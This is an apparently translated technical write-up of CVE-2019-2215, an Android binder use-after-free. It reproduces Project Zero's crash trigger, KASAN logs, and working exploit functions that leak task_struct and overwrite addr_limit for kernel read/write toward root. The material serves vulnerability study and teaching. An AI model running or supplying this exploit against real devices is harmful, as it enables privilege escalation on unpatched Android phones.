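bugs.chromium project-zero email: Project Zero's public report email.
Project Zero blog: explains the root cause of the vulnerability and the exploitation details.
Linux source code for each version: convenient for looking up how the various types are defined, but its struct and other definitions are fairly old, so for those it is better to consult other sources.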
4.4.169-gee9976dde895
Download the latest NDK from Google.
Compile with:
$ ndk/<ndk版本号>/toolchains/llvm/prebuilt/<ndk工具平台>/bin/aarch64-linux-android28-clang -o poc poc.c
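Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
A short PoC containing only `main`. It triggers the bug and shows where the kernel is vulnerable. Running it on an unpatched system may crash the kernel.
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
Uses the vulnerability to gain arbitrary kernel read/write. After this PoC runs, the output of `uname -a` shows EXPLOITED KERNEL.
Source: https://hernan.de/blog/tailoring-cve-2019-2215-to-achieve-root/
Uses the vulnerability for local privilege escalation.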
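Root cause: when a process that uses epoll calls `BINDER_THREAD_EXIT` to end a binder thread, the `binder_thread` struct is freed. Later, when the program exits or calls `EPOLL_CTL_DEL`, the kernel walks the wait list inside the already freed `binder_thread` to unlink an entry from it.
The problem is that, at the time the program exits or epoll performs its cleanup, the wait list being accessed lives inside the freed `binder_thread` struct, which is a use-after-free (UAF). If memory is allocated to reoccupy the slot after `binder_thread` is freed, the list operation acts on that attacker-controlled memory and leaks information into it. This information can then be used to reach arbitrary kernel read/write and even privilege escalation.
The `binder_thread` struct is the key structure behind the UAF: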

    // https://android.googlesource.com/kernel/msm/+/550c01d0e051461437d6e9d72f573759e7bc5047/drivers/android/binder.c#615
    struct binder_thread {
        struct binder_proc *proc;
        struct rb_node rb_node;
        struct list_head waiting_thread_node;
        int pid;
        int looper;              /* only modified by this thread */
        bool looper_need_return; /* can be written by other thread */
        struct binder_transaction *transaction_stack;
        struct list_head todo;
        bool process_todo;
        struct binder_error return_error;
        struct binder_error reply_error;
        // uaf point (offset 0xA0)
        wait_queue_head_t wait;
        struct binder_stats stats;
        atomic_t tmp_ref;
        bool is_dead;
        // root point (offset 0x190)
        struct task_struct *task;
    };

The code of poc.c, which triggers the vulnerability:

    // poc.c
    #include <fcntl.h>
    #include <sys/epoll.h>
    #include <sys/ioctl.h>
    #include <unistd.h>

    #define BINDER_THREAD_EXIT 0x40046208ul

    int main()
    {
        int fd, epfd;
        struct epoll_event event = { .events = EPOLLIN };

        fd = open("/dev/binder0", O_RDONLY);
        epfd = epoll_create(1000);
        epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
        ioctl(fd, BINDER_THREAD_EXIT, NULL);
    }

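The hard-coded `BINDER_THREAD_EXIT` value can be cross-checked against the generic Linux ioctl encoding. The sketch below assumes the common layout (direction in bits 30-31, size in bits 16-29, type in bits 8-15, number in bits 0-7) and that the command is a write-direction ioctl of type `'b'`, number 8, with a 4-byte argument. The helper names `ioc_encode` and `binder_thread_exit_cmd` are made up for illustration and are not part of the PoC.

```c
#include <assert.h>
#include <stdint.h>

/* Direction value for "userspace writes to the kernel" in the generic layout. */
#define IOC_DIR_WRITE 1u

/* Hypothetical helper: packs an ioctl command as dir:2 | size:14 | type:8 | nr:8.
 * Some architectures use a different split, so treat this as an assumption. */
uint32_t ioc_encode(uint32_t dir, uint32_t type, uint32_t nr, uint32_t size)
{
    assert(size < (1u << 14)); /* size must fit in 14 bits */
    return (dir << 30) | (size << 16) | (type << 8) | nr;
}

/* BINDER_THREAD_EXIT modelled as a write ioctl, type 'b', number 8, 4-byte payload. */
uint32_t binder_thread_exit_cmd(void)
{
    return ioc_encode(IOC_DIR_WRITE, 'b', 8, 4);
}
```

Under these assumptions `binder_thread_exit_cmd()` evaluates to the same constant that poc.c defines by hand.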
KASAN crash output (partially omitted):
//https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414028
[ 464.504637] c0 3033 ==================================================================
[ 464.504747] c0 3033 BUG: KASAN: use-after-free in remove_wait_queue+0x48/0x90
[ 464.511836] c0 3033 Write of size 8 at addr 0000000000000000 by task new.out/3033
[ 464.518893] c0 3033
[ 464.526548] c0 3033 CPU: 0 PID: 3033 Comm: new.out Tainted: G C 4.4.177-ga9e0ec5cb774 #1
[ 464.529044] c0 3033 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
[ 464.538334] c0 3033 Call trace:
[ 464.545928] c0 3033 [<ffffff900808f0e8>] dump_backtrace+0x0/0x34c
[ 464.549328] c0 3033 [<ffffff900808f574>] show_stack+0x1c/0x24
[ 464.555411] c0 3033 [<ffffff900858bcc8>] dump_stack+0xb8/0xe8
[ 464.561319] c0 3033 [<ffffff90082b1ecc>] print_address_description+0x94/0x334
[ 464.567219] c0 3033 [<ffffff90082b23f0>] kasan_report+0x1f8/0x340
[ 464.574501] c0 3033 [<ffffff90082b0740>] __asan_store8+0x74/0x90
[ 464.580753] c0 3033 [<ffffff9008139fc0>] remove_wait_queue+0x48/0x90
[ 464.587125] c0 3033 [<ffffff9008336874>] ep_unregister_pollwait.isra.8+0xa8/0xec
[ 464.593617] c0 3033 [<ffffff9008337744>] ep_free+0x74/0x11c
[ 464.601149] c0 3033 [<ffffff9008337820>] ep_eventpoll_release+0x34/0x48
[ 464.606988] c0 3033 [<ffffff90082c589c>] __fput+0x10c/0x32c
[ 464.613724] c0 3033 [<ffffff90082c5b38>] ____fput+0x18/0x20
[ 464.619463] c0 3033 [<ffffff90080eefdc>] task_work_run+0xd0/0x128
[ 464.625193] c0 3033 [<ffffff90080bd890>] do_exit+0x3e4/0x1198
[ 464.631260] c0 3033 [<ffffff90080c0ff8>] do_group_exit+0x7c/0x128
[ 464.637167] c0 3033 [<ffffff90080c10c4>] __wake_up_parent+0x0/0x44
[ 464.643421] c0 3033 [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[ 464.649944] c0 3033
[ 464.655899] c0 3033 Allocated by task 3033:
[ 464.658257] [<ffffff900808e5a4>] save_stack_trace_tsk+0x0/0x204
[ 464.663899] [<ffffff900808e7c8>] save_stack_trace+0x20/0x28
[ 464.669882] [<ffffff90082b0b14>] kasan_kmalloc.part.5+0x50/0x124
[ 464.675528] [<ffffff90082b0e38>] kasan_kmalloc+0xc4/0xe4
[ 464.681597] [<ffffff90082ac8a4>] kmem_cache_alloc_trace+0x12c/0x240
[ 464.686992] [<ffffff90094093c0>] binder_get_thread+0xdc/0x384
[ 464.693319] [<ffffff900940969c>] binder_poll+0x34/0x1bc
[ 464.699127] [<ffffff900833839c>] SyS_epoll_ctl+0x704/0xf84
[ 464.704423] [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[ 464.709971] c0 3033
[ 464.714124] c0 3033 Freed by task 3033:
[ 464.716396] [<ffffff900808e5a4>] save_stack_trace_tsk+0x0/0x204
[ 464.721699] [<ffffff900808e7c8>] save_stack_trace+0x20/0x28
[ 464.727678] [<ffffff90082b16a4>] kasan_slab_free+0xb0/0x1c0
[ 464.733322] [<ffffff90082ae214>] kfree+0x8c/0x2b4
[ 464.738952] [<ffffff900940ac00>] binder_thread_dec_tmpref+0x15c/0x1c0
[ 464.743750] [<ffffff900940d590>] binder_thread_release+0x284/0x2e0
[ 464.750253] [<ffffff90094149e0>] binder_ioctl+0x6f4/0x3664
[ 464.756498] [<ffffff90082e1364>] do_vfs_ioctl+0x7f0/0xd58
[ 464.762052] [<ffffff90082e1968>] SyS_ioctl+0x9c/0xc0
[ 464.767513] [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
------------------------------ ... ... -----------------------------------
[ 465.201706] c0 3033 Call trace:
------------------------------ ... ... -----------------------------------
[ 465.298084] c0 3033 [<ffffff90082b1ddc>] kasan_end_report+0x38/0x3c
[ 465.306712] c0 3033 [<ffffff90082b22e4>] kasan_report+0xec/0x340
[ 465.313308] c0 3033 [<ffffff90082b0740>] __asan_store8+0x74/0x90
[ 465.319390] c0 3033 [<ffffff9008139fc0>] remove_wait_queue+0x48/0x90
[ 465.325581] c0 3033 [<ffffff9008336874>] ep_unregister_pollwait.isra.8+0xa8/0xec
[ 465.332075] c0 3033 [<ffffff9008337744>] ep_free+0x74/0x11c
[ 465.339607] c0 3033 [<ffffff9008337820>] ep_eventpoll_release+0x34/0x48
[ 465.345437] c0 3033 [<ffffff90082c589c>] __fput+0x10c/0x32c
[ 465.352183] c0 3033 [<ffffff90082c5b38>] ____fput+0x18/0x20
[ 465.357920] c0 3033 [<ffffff90080eefdc>] task_work_run+0xd0/0x128
[ 465.363643] c0 3033 [<ffffff90080bd890>] do_exit+0x3e4/0x1198
[ 465.369711] c0 3033 [<ffffff90080c0ff8>] do_group_exit+0x7c/0x128
[ 465.375617] c0 3033 [<ffffff90080c10c4>] __wake_up_parent+0x0/0x44
[ 465.381882] c0 3033 [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[ 465.388494] c0 3033 Code: f9400261 f00124e0 91000000 945d2daa (d4210000)
[ 465.394428] c0 3033 ---[ end trace 3129689a85316455 ]---
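The KASAN output can be used to reconstruct the sequence of calls that crashes the kernel (line numbers below count lines of the log listing, with the URL comment as line 1):

1. The `epoll_ctl` call allocates the `binder_thread` struct. The allocation path is listed under `Allocated by task` (line 27).
2. The `ioctl` call then frees the `binder_thread` struct. The path is listed under `Freed by task` (line 38), from `SyS_ioctl` (line 47) up to `kfree` (line 42).
3. Up to this point the program runs normally, but the crash is triggered when it is about to exit. `Call trace` (line 50) reports the call stack at the time of the crash.
4. Reading in call order from bottom to top, everything before `ep_eventpoll_release` (line 58) belongs to process exit, and the calls from `ep_eventpoll_release` up to `remove_wait_queue` are epoll's cleanup after the program ends. In other words, the crash happens inside the call to `remove_wait_queue`.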
In `remove_wait_queue`, the parameter `wq_head` is the `wait` member of `binder_thread`:

    // https://code.woboq.org/linux/linux/kernel/sched/wait.c.html#39
    void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
    {
        unsigned long flags;

        spin_lock_irqsave(&wq_head->lock, flags);
        __remove_wait_queue(wq_head, wq_entry);
        spin_unlock_irqrestore(&wq_head->lock, flags);
    }

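After `binder_thread` is freed, epoll still holds a pointer to its `wait` member (a `wait_queue_head`), and nothing clears that pointer, so it now refers to freed memory. When the program exits and `remove_wait_queue` is called, `spin_lock_irqsave` operates on the spinlock inside `wait`, and that access to freed memory is where the error is reported.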

    int epfd;
    void *dummy_page_4g_aligned;
    unsigned long current_ptr;
    int binder_fd;
    int kernel_rw_pipe[2];

    int main(void)
    {
        printf("Starting POC\n");
        //pin_to(0);

        dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
        if (dummy_page_4g_aligned != (void*)0x100000000UL)
            err(1, "mmap 4g aligned");
        if (pipe(kernel_rw_pipe))
            err(1, "kernel_rw_pipe");

        binder_fd = open("/dev/binder", O_RDONLY);
        epfd = epoll_create(1000);

        leak_task_struct();
        clobber_addr_limit();

        setbuf(stdout, NULL);
        printf("should have stable kernel R/W now\n");
        ......
    }

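1. `mmap` maps `dummy_page_4g_aligned`. This memory is used later when crafting data; its purpose is to get past the `spin_lock_irqsave` check.
2. Open `"/dev/binder"` and call `epoll_create`. These are the same initial steps as in poc.c and set up epoll.
3. `leak_task_struct` leaks the address of `task_struct`.
4. `clobber_addr_limit` overwrites `addr_limit` to gain arbitrary kernel read/write.

The two functions that matter are `leak_task_struct` and `clobber_addr_limit`; they are analysed one by one below.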
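To exploit the UAF, first use `writev` to reclaim the memory freed from `binder_thread`, then use `EPOLL_CTL_DEL` to call `remove_wait_queue`, which leaks the address of `wait` into the reclaimed memory. Because the `task_struct` pointer and `wait` are both members of `binder_thread`, the `task_struct` pointer can be located from that address once the offset between them is known.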
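Reclaiming kernel memory with `writev`
A `writev` call goes through `rw_copy_check_uvector`, which checks that every entry of the `struct iovec` array passed as the second argument points into user space. Once the check passes, the array is copied into kernel space, and it is not checked again even if an `iov_base` later stops pointing to user space. These two properties combine as follows: if the iovec array is built to be the same size as `binder_thread`, or close to it, the kernel copy is very likely to land in the slot that `binder_thread` just freed; and because `rw_copy_check_uvector` validates only once, after a kernel address has been leaked into the array, kernel memory can be read through it.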
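Leaking the address of `wait` through `remove_wait_queue`
When epoll handles `EPOLL_CTL_DEL`, it calls `remove_wait_queue` to clean up the wait list. With the data in the iovec array crafted so that the `spin_lock_irqsave` check passes, execution reaches `__remove_wait_queue`. The relevant functions are: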

    static inline void __remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
    {
        list_del(&old->task_list);
    }

    static inline void list_del(struct list_head *entry)
    {
        __list_del(entry->prev, entry->next);
        entry->next = LIST_POISON1;
        entry->prev = LIST_POISON2;
    }

    static inline void __list_del(struct list_head * prev, struct list_head * next)
    {
        next->prev = prev;
        WRITE_ONCE(prev->next, next);
    }

The call chain is: `__remove_wait_queue` -> `list_del` -> `__list_del`
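The `entry` argument of `list_del` is the `task_list` to be removed. After `__list_del` runs, the neighbours of `entry` point at each other and the `task_list` that `entry` refers to has been unlinked from the wait list.
If the entry being removed is the only one on the wait list, its `prev` and `next` are both the list head, so the two writes in `__list_del` make `head->next` and `head->prev` point to `head` itself. Since `head` is located inside the memory we reclaimed from `binder_thread`, both fields now hold the address of `head`, that is, the address of the `wait` list inside `binder_thread`.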
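The single-entry case can be reproduced in user space. The following is a minimal sketch that copies the pointer updates of `__list_del` and `list_del`; the `demo_` names and the poison values are illustrative assumptions, not the kernel's definitions.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace copy of the kernel's doubly linked list node. */
struct list_head {
    struct list_head *next, *prev;
};

/* Illustrative poison values; the kernel defines its own constants. */
#define DEMO_POISON1 ((struct list_head *)0x100)
#define DEMO_POISON2 ((struct list_head *)0x200)

/* Links `entry` as the only element on the list rooted at `head`. */
void demo_link_single(struct list_head *head, struct list_head *entry)
{
    head->next = head->prev = entry;
    entry->next = entry->prev = head;
}

/* Same pointer updates as __list_del() followed by list_del()'s poisoning. */
void demo_list_del(struct list_head *entry)
{
    struct list_head *prev = entry->prev;
    struct list_head *next = entry->next;

    assert(prev != NULL && next != NULL);
    next->prev = prev; /* head->prev = head when entry was alone */
    prev->next = next; /* head->next = head when entry was alone */
    entry->next = DEMO_POISON1;
    entry->prev = DEMO_POISON2;
}
```

Even if the two head fields are overwritten with arbitrary values after linking, which is what the reclaimed iovec data does, calling `demo_list_del` on the entry writes the address of the head back into both fields, because the entry still remembers where the head was.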
Now the PoC can be analysed:

    // size of struct binder_thread: 408 bytes = 0x198
    #define BINDER_THREAD_SZ 0x190
    // use struct iovec to refill the freed binder_thread
    // size of struct iovec is 16 bytes (64-bit system)
    #define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) // 25
    // offset of wait_queue in binder_thread
    #define WAITQUEUE_OFFSET 0xA0
    // figure out the index of wait_queue in the iovec array
    #define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) // 10

    void leak_task_struct(void)
    {
        struct epoll_event event = { .events = EPOLLIN };
        if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event))
            err(1, "epoll_add");

        struct iovec iovec_array[IOVEC_ARRAY_SZ];
        memset(iovec_array, 0, sizeof(iovec_array));

        iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
        iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000;                 /* wq->task_list->next */
        iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
        iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

        int b;
        int pipefd[2];
        if (pipe(pipefd))
            err(1, "pipe");
        if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000)
            err(1, "pipe size");
        static char page_buffer[0x1000];
        //if (write(pipefd[1], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "fill pipe");

        pid_t fork_ret = fork();
        if (fork_ret == -1)
            err(1, "fork");
        if (fork_ret == 0) {
            /* Child process */
            prctl(PR_SET_PDEATHSIG, SIGKILL);
            sleep(2);
            printf("CHILD: Doing EPOLL_CTL_DEL.\n");
            epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
            printf("CHILD: Finished EPOLL_CTL_DEL.\n");
            // first page: dummy data
            if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer))
                err(1, "read full pipe");
            close(pipefd[1]);
            printf("CHILD: Finished write to FIFO.\n");
            exit(0);
        }
        //printf("PARENT: Calling READV\n");
        ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
        b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
        printf("writev() returns 0x%x\n", (unsigned int)b);
        // second page: leaked data
        if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer))
            err(1, "read full pipe");
        //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer));

        printf("PARENT: Finished calling READV\n");
        int status;
        if (wait(&status) != fork_ret)
            err(1, "wait");

        current_ptr = *(unsigned long *)(page_buffer + 0xe8);
        printf("current_ptr == 0x%lx\n", current_ptr);
    }

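1. `EPOLL_CTL_ADD` registers `binder_fd` for monitoring, the same as in poc.c.
2. `iovec_array` is initialised and filled with crafted data.
3. A pipe is created and its buffer size is set; it is used later for communication between parent and child.
4. `fork` creates the child process. The child starts by sleeping for two seconds, so follow the parent first.
5. The parent issues `BINDER_THREAD_EXIT`; the `binder_thread` struct is now freed.
6. The parent calls `writev`. Because of the `writev` behaviour described above, the memory freed from `binder_thread` is reoccupied by the kernel copy of `iovec_array[IOVEC_ARRAY_SZ]`. `writev` then reads the buffers described by `iovec_array` and writes them to `pipefd[1]`. From the crafted data, `iovec_array[9]` and everything before it are zero, so `writev` starts at `iovec_array[10]` and writes the 0x1000 bytes of junk at `dummy_page_4g_aligned` into the pipe. The pipe size is also 0x1000, so the pipe is now full and `writev` blocks. Control passes to the child.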
Since the memory of `binder_thread` is now occupied by the crafted data, memory currently looks like this:
| binder_thread struct | iovec_array |
| ------------------------- | ------------------------------------------------------ |
| 0x00: ...                 | 0x00: iovec_array[0].iov_base                          |
| 0x08: ...                 | 0x08: iovec_array[0].iov_len                           |
| ... | ... |
| ... | ... |
| 0xA0: wait.lock | 0xA0: iovec_array[10].iov_base (dummy_page_4g_aligned) |
| 0xA8: wait.task_list.next | 0xA8: iovec_array[10].iov_len (0x1000) |
| 0xB0: wait.task_list.prev | 0xB0: iovec_array[11].iov_base (0xDEADBEEF) |
| 0xB8: ... | 0xB8: iovec_array[11].iov_len (0x1000) |
| ... | ... |
| ... | ... |
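The mapping in the table follows from simple division. Below is a small sketch, assuming a 64-bit target where `struct iovec` is 16 bytes with `iov_base` in the first 8 bytes and `iov_len` in the last 8; the function names are invented for this example.

```c
#include <assert.h>
#include <stddef.h>

#define IOVEC_SIZE 16u /* assumed sizeof(struct iovec) on a 64-bit target */

/* Number of whole iovec entries that fit in `alloc_size` bytes. */
size_t iovec_count_for(size_t alloc_size)
{
    return alloc_size / IOVEC_SIZE;
}

/* Index of the iovec entry that covers byte `offset` of the allocation. */
size_t iovec_index_at(size_t offset)
{
    return offset / IOVEC_SIZE;
}

/* Returns 1 if `offset` lands on iov_len, 0 if it lands on iov_base. */
int offset_is_iov_len(size_t offset)
{
    assert(offset % 8 == 0); /* both fields are 8-byte aligned */
    return (offset % IOVEC_SIZE) == 8;
}
```

With `BINDER_THREAD_SZ` of 0x190 this gives 25 entries, and offsets 0xA0, 0xA8 and 0xB0 resolve to `iovec_array[10].iov_base`, `iovec_array[10].iov_len` and `iovec_array[11].iov_base` respectively.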
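7. The child calls `EPOLL_CTL_DEL`, which triggers the UAF. Inside `remove_wait_queue`, the value of `dummy_page_4g_aligned` sits where the spinlock is expected; its low 32 bits are zero, so the lock looks free and the spinlock check passes. When the list entry is unlinked, `wait.task_list.next` and `wait.task_list.prev` are both set to point to `wait.task_list` itself, so `iovec_array[10].iov_len` and `iovec_array[11].iov_base` now both hold the leaked address.
8. The child then calls `read`, draining the junk data the parent wrote earlier, which unblocks the parent. The child exits and control returns to the parent.
9. The parent resumes the unfinished `writev` and writes the 0x1000 bytes at `iovec_array[11].iov_base` into the pipe. That `iov_base` was overwritten in the child with the leaked address, so what gets written is kernel memory starting at `wait.task_list`, that is, at offset 0xA8 of `binder_thread`.
10. The parent calls `read` and stores this data in `page_buffer`.
11. The `task` pointer is at offset 0x190 of `binder_thread` and the leak starts at offset 0xA8, so the pointer is at offset 0x190 - 0xA8 = 0xE8 of `page_buffer`. It is saved in `current_ptr` and the function returns.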
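The 0xe8 constant in the PoC can be derived from the two struct offsets. Below is a minimal sketch using the offsets quoted in this write-up; `task_offset_in_leak` and `extract_task_ptr` are hypothetical helper names, and the code only models the arithmetic in user space.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define WAITQUEUE_OFFSET 0xA0 /* binder_thread.wait, as given above */
#define TASK_OFFSET 0x190     /* binder_thread.task, as given above */

/* Offset of the task pointer inside the leaked page. The leak starts at
 * wait.task_list, which sits 8 bytes after the start of wait. */
size_t task_offset_in_leak(void)
{
    return TASK_OFFSET - (WAITQUEUE_OFFSET + 8);
}

/* Hypothetical helper: reads the 8-byte task pointer out of the leaked page. */
uint64_t extract_task_ptr(const unsigned char *page, size_t page_len)
{
    uint64_t value;
    size_t off = task_offset_in_leak();

    assert(off + sizeof(value) <= page_len);
    memcpy(&value, page + off, sizeof(value)); /* safe for any alignment */
    return value;
}
```

Calling `extract_task_ptr(page_buffer, sizeof(page_buffer))` on the second page read from the pipe would yield the same value the PoC stores in `current_ptr`, assuming the struct layout matches the target kernel.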
Leak process: [figure not preserved]
Next, `clobber_addr_limit`:

    void clobber_addr_limit(void)
    {
        struct epoll_event event = { .events = EPOLLIN };
        if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event))
            err(1, "epoll_add");

        struct iovec iovec_array[IOVEC_ARRAY_SZ];
        memset(iovec_array, 0, sizeof(iovec_array));

        unsigned long second_write_chunk[] = {
            1,                  /* iov_len */
            0xdeadbeef,         /* iov_base (already used) */
            0x8 + 2 * 0x10,     /* iov_len (already used) */
            current_ptr + 0x8,  /* next iov_base (addr_limit) */
            8,                  /* next iov_len (sizeof(addr_limit)) */
            0xfffffffffffffffe  /* value to write */
        };

        iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
        iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1;                      /* wq->task_list->next */
        iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
        iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10;     /* iov_len of previous, then this element and next element */
        iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
        iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

        int socks[2];
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks))
            err(1, "socketpair");
        if (write(socks[1], "X", 1) != 1)
            err(1, "write socket dummy byte");

        pid_t fork_ret = fork();
        if (fork_ret == -1)
            err(1, "fork");
        if (fork_ret == 0) {
            /* Child process */
            prctl(PR_SET_PDEATHSIG, SIGKILL);
            sleep(2);
            printf("CHILD: Doing EPOLL_CTL_DEL.\n");
            epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
            printf("CHILD: Finished EPOLL_CTL_DEL.\n");
            if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
                err(1, "write second chunk to socket");
            exit(0);
        }
        ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
        struct msghdr msg = {
            .msg_iov = iovec_array,
            .msg_iovlen = IOVEC_ARRAY_SZ
        };
        printf("PARENT: Doing recvmsg.\n");
        int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);
        printf("PARENT recvmsg() returns %d, expected %lu\n", recvmsg_result,
            (unsigned long)(iovec_array[IOVEC_INDX_FOR_WQ].iov_len +
            iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len +
            iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len));
    }

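1. `EPOLL_CTL_ADD`, the same operation as before.
2. `iovec_array` is initialised with crafted data.
3. `second_write_chunk` is initialised with crafted data.
4. `socketpair` creates the sockets, and one byte is written to `socks[1]`.
5. `fork` creates the child, which calls `sleep(2)`; follow the parent first.
6. The parent issues `BINDER_THREAD_EXIT`; the `binder_thread` struct is now freed.
7. The parent calls `recvmsg`, which reads the one byte written to the socket earlier. This is the first read (recvmsg#1). Like `writev`, `recvmsg` copies the user-space iovec array into kernel space, so this call reoccupies the memory of `binder_thread`. The socket has no more data, so the parent blocks (the call uses `MSG_WAITALL`) and control passes to the child.
8. The child calls `EPOLL_CTL_DEL`, which triggers the UAF. As before, `iovec_array[10].iov_len` and `iovec_array[11].iov_base` are overwritten with the address of `wait.task_list`.
9. The child calls `write` to send `second_write_chunk` to the socket. The socket now has data, so the parent is unblocked. The child exits and control returns to the parent.
10. Following `iovec_array[11].iov_len`, the parent reads 0x28 bytes into `iovec_array[11].iov_base`. This is the second read (recvmsg#2). Because that `iov_base` now points at `wait.task_list`, these 0x28 bytes overwrite the kernel copy of the array from `iovec_array[10].iov_len` through `iovec_array[12].iov_len`.
11. `second_write_chunk` is 0x30 bytes long, so `recvmsg` still has 8 bytes to read: the final 8 bytes, `0xfffffffffffffffe`. By now `iovec_array[12].iov_base` has been overwritten during recvmsg#2 with `current_ptr + 0x8`, that is, `task_struct + 0x8`, which is the address of `addr_limit`. After this third read (recvmsg#3), `addr_limit` is `0xfffffffffffffffe`, arbitrary address read/write is obtained, and the function returns.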
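The self-overwriting iovec trick can be modelled entirely in user space. The sketch below is a simplified simulation, not kernel code: `scatter_copy` stands in for the kernel's copy loop, a local variable stands in for `addr_limit`, and the effect of `EPOLL_CTL_DEL` is applied by hand. All names are assumptions made for the example.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Same field order as struct iovec on a 64-bit target. */
struct fake_iovec {
    uint64_t iov_base;
    uint64_t iov_len;
};

#define IOVEC_COUNT 25
#define WQ_INDEX 10

/* Copies src into the buffers described by iov[], reading each entry only
 * when it is reached. That late read is what the overwrite relies on. */
static void scatter_copy(struct fake_iovec *iov, int count,
                         const unsigned char *src, size_t src_len)
{
    for (int i = 0; i < count && src_len > 0; i++) {
        size_t n = iov[i].iov_len < src_len ? (size_t)iov[i].iov_len : src_len;
        if (n == 0)
            continue;
        memcpy((void *)(uintptr_t)iov[i].iov_base, src, n);
        src += n;
        src_len -= n;
    }
}

/* Returns the final value of the stand-in addr_limit variable. */
uint64_t simulate_addr_limit_overwrite(void)
{
    struct fake_iovec iov[IOVEC_COUNT];
    unsigned char dummy[8], first = 'X';
    uint64_t addr_limit = 0x7fffffffffULL; /* illustrative start value */

    memset(iov, 0, sizeof(iov));
    iov[WQ_INDEX].iov_base = (uintptr_t)dummy;
    iov[WQ_INDEX].iov_len = 1;
    iov[WQ_INDEX + 1].iov_base = 0xDEADBEEF;
    iov[WQ_INDEX + 1].iov_len = 0x8 + 2 * 0x10;
    iov[WQ_INDEX + 2].iov_base = 0xBEEFDEAD;
    iov[WQ_INDEX + 2].iov_len = 8;

    /* recvmsg#1: the single dummy byte is consumed by iov[10]. */
    scatter_copy(iov, WQ_INDEX + 1, &first, 1);

    /* Effect of EPOLL_CTL_DEL: offsets 0xA8 and 0xB0 now hold the
     * address of offset 0xA8 itself (the list head). */
    uint64_t head = (uintptr_t)((unsigned char *)iov + 0xA8);
    iov[WQ_INDEX].iov_len = head;
    iov[WQ_INDEX + 1].iov_base = head;

    uint64_t chunk[] = { 1, 0xdeadbeef, 0x8 + 2 * 0x10,
                         (uintptr_t)&addr_limit, 8, 0xfffffffffffffffeULL };

    /* recvmsg#2 and recvmsg#3: copying resumes at iov[11]. */
    scatter_copy(&iov[WQ_INDEX + 1], IOVEC_COUNT - (WQ_INDEX + 1),
                 (const unsigned char *)chunk, sizeof(chunk));
    assert(iov[WQ_INDEX + 2].iov_len == 8);
    return addr_limit;
}
```

The first 0x28 bytes of the chunk rewrite the array itself, including `iov[12].iov_base`, so the last 8 bytes are delivered to the stand-in `addr_limit`. In the real exploit the destination is `current_ptr + 0x8` inside the kernel.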

    // elixir.bootlin.com/linux/v5.5.19/source/include/linux/sched.h#L635
    // The linked Linux version is newer than the test device's 4.4.169 because the
    // struct definitions on this site tend to lag behind: the matching definition
    // cannot be found under 4.4 there, while the one in this version matches the
    // test device.
    struct task_struct {
    #ifdef CONFIG_THREAD_INFO_IN_TASK
        /*
         * For reasons of header soup (see current_thread_info()), this
         * must be the first element of task_struct.
         */
        struct thread_info thread_info;
    #endif
        volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped */
        void *stack;
        atomic_t usage;
        unsigned int flags; /* per process flags, defined below */
        unsigned int ptrace;
        ......
    }

    // elixir.bootlin.com/linux/v5.5.19/source/arch/arm64/include/asm/thread_info.h#L26
    struct thread_info {
        unsigned long flags;        /* low level flags */
        mm_segment_t addr_limit;    /* address limit */
    #ifndef CONFIG_THREAD_INFO_IN_TASK
        struct task_struct *task;   /* main task structure */
    #endif
    #ifdef CONFIG_ARM64_SW_TTBR0_PAN
        u64 ttbr0;                  /* saved TTBR0_EL1 */
    #endif
        int preempt_count;          /* 0 => preemptable, <0 => bug */
    #ifndef CONFIG_THREAD_INFO_IN_TASK
        int cpu;                    /* cpu */
    #endif
    };

Overwrite process: [figure not preserved]
